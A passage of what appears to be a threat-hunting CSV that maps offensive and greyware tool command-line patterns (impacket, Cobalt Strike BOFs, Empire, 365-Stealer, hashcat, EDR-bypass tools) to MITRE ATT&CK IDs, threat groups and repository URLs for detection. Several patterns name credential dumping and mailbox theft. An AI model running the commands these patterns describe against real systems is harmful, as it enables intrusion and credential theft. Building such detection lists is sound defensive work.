- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"* CSExec.py*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -CShardDLLBytes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* cups-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cups-queue-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --custom_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* --custom-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"* --custom-steal listusers*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"* --custom-steal onedrive*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"* --custom-steal onenote*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"* --custom-steal outlook*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"* --cve=* --command*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* CVE-2023-38831-RaRCE*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"* cvs-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* cvs-brute-repository.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -d * -dc * -nu 'neo4j' -np *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -d * -n * -m reverse*=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"* -d * -n * -m rot13*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"* -d * -t axfr >*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -d * -t zonewalk > *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"* -d * -t zonewalk*","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2336","516","2023-09-11T05:14:02Z","2010-12-16T03:25:49Z" +"* -d * -u * -p * --listener * --target *$DC_HOST*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -d * -u *\* -p * --da*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"* -d *Active Protection DLL for SylantStrike*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"* -d:sleepmask*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* daap-get-library.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -daisyserver *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* darkcodersc *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"* darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"* daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --dbms=mysql -u *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --dc * -m custom --filter *objectCategory*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-host * -spn * -impersonate *","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"* -dc-ip * -so *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -dc-ip * -computer-pass *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -dc-ip * -dump *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-ip * -impersonate *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --dc-ip * -request * -format hashcat*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z" +"* -dc-ip * -target-ip *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --dc-ip * --vuln --enabled*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -dc-ip *SAMDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* dclist *","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dcow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"* dcow.cpp*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" +"* -DDONUT_EXE *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* --deauth * -a TR:GT:AP:BS:SS:ID wlan*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* decrypt *.aes.zip*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* default_logins.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"* Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* DelegationBOF.c *","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"* delegationx64.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"* delegationx86.o*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"* deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"* Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"* denied AXFR from *","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* deploy_cobalt_beacon*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"* DesertFox.go","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 